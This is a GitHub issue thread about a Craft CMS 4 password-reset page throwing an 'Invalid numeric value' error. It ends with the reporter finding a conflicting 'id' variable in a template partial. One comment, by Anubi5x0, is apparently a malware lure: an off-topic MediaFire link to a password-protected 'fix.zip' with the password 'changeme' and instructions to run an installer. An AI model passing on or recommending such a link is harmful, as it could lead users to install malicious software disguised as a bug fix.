### ISSUE TITLE
[4.x]: Cannot use password reset on custom template - Invalid numeric value: error

### ISSUE THREAD

**Issue by terryupton** [craftcms/cms#15627]
### Description
When using a custom template or even the example template (https://craftcms.com/knowledge-base/front-end-user-accounts#set-password-form), craft is throwing an error: Invalid Argument – [yii\base\InvalidArgumentException](https://www.yiiframework.com/doc-2.0/yii-base-invalidargumentexception.html)
Invalid numeric value:

<img width="1952" alt="Screenshot 2024-08-29 at 15 44 30" src="https://github.com/user-attachments/assets/72ec4ed2-2a61-4cd0-844b-6bb11ef6ca75">

The password reset works if you disable the config variable for the custom template, using Crafts native password reset screen.   

E.G `->setPasswordPath('account/password/new')`

Is Craft is trying to validate against a number (int) numeric value?
However, the id in the query string contains hyphens (-) so is this causing the validation failure as it isn't a number? 

### Steps to reproduce

1. Trigger a password reset either via the front-end form or from the control panel ('copy password reset url')
2. Paste the url into the browser.
3. See the error. 

### Expected behavior
1. Should load the default template for the password reset.

### Actual behavior
1 Throwing an error Invalid numeric value.

### Craft CMS version

Craft Pro 4.11.5

### PHP version

8.2.22

### Database type and version

MySQL 8.0.36

### Image driver and version

Imagick 3.7.0 (ImageMagick 6.9.11-60)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by i-just** [comment]
Hi, thanks for getting in touch! It sounds a lot like https://github.com/craftcms/cms/issues/15152.

I verified that using a custom template for the set password page works as expected. 

Based on the screenshot of the errors, it looks like maybe in your template you’re trying to use the `id` query string param to find an element by id, but the value of that param is a uid; perhaps a user or an entry? I’d start by reviewing the content of the `account/password/new` template.

I hope this helps! 

I will close this now, but if you’re still struggling with this, feel free to reply.

**Comment by terryupton** [comment]
I have disabled all plugins and removed all modules but I am still seeing this error on custom template.
I am testing this with a commerce customer. If I try to do this with a user who has CP access then the native password reset form is used and this works.

I have even used the demo templates and I still see this error, so it isn't in my template code. 

Any ideas what else I can do to debug this? 

It feels like a Craft bug TBH.

**Comment by terryupton** [comment]
@i-just I don't believe it is related to https://github.com/craftcms/cms/issues/15152.
Because, I am only seeing this on the custom set password page and I have also used the demo template for this and seeing this issue too. I don't have any for loops in this template and neither does the demo template.

**Comment by terryupton** [comment]
Ok I have figured it out.
I was suing id in one of my other partials that is loaded into this page. This was causing a conflict as that id wasn't valid and so it was breaking the template.

**Comment by i-just** [comment]
Great news! Glad you got to the bottom of it.
